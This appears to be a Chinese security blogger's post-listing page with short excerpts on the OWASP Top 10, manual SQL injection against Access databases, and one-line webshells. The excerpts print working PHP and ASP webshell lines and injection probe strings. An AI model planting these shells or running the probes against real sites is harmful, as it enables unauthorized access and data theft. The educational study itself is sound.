- 博客(7)
- 收藏
- 关注
RSS订阅转载 OWASP TOP 10 (2017)
A1:注入 注入攻击漏洞,例如SQL,OS以及LDAP注入。这些攻击发生在当不可信的数据作为命令或者查询语句的一部分,被发送给解释器的时候。攻击者发送的恶意数据可以欺骗解释器,以执行计划外的命令或者在未被恰当授权时访问数据。A2:失效的身份验证和会话管理 与身份认证和会话管理相关的应用程序功能往往得不到正确的实现,这就导致了攻击者破坏密码,密钥,会话令牌或攻击其他的漏洞去冒充其他用户的身份(暂...
2018-05-19 11:14:02
846
原创 SQL手工注入之access手工注入
一、判断是否存在注入‘ 页面返回错误,可能存在注入and 1=1 页面返回正确 and1=2 页面返回错误 可能存在注入二、判断数据库类型1.and (select count(*) from mysysobjects)>0 -返回权限不足 为access数据库2.and (select count(*) from sysobjects)>0 -但会正常为MS...
2018-05-13 09:23:49
554
原创 一句话木马
什么叫一句话木马 就是一句简单的脚本语言,一句话木马分为php,asp,aspx等, 常见的有php的一句话木马 <?php@eval($_POST[value]));?> 常见asp的一句话木马 <%execute(request("value"))%> 常见的aspx一句话木马 <%@ Page Language="Jscri...
2018-03-19 23:36:17
767
原创 我的Web安全之路
一、写给自己 出于自己的专业以及自己的兴趣所导,选择了Web安全这个方向来深入的学习,目前只是一个大二的学生,需要学习的东西还有许多,也对自己即将进入Web安全学习的时候理清学习的思路。二、如何学习 知乎上余弦先生以及其他大牛对于“零基础如何学习Web安全”的回答对我以后的学习有着很重要的作用,具体网址我放这里给想看的人参考一下 (https://www.zhihu.com/question/...
2018-03-19 14:03:42
1020
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人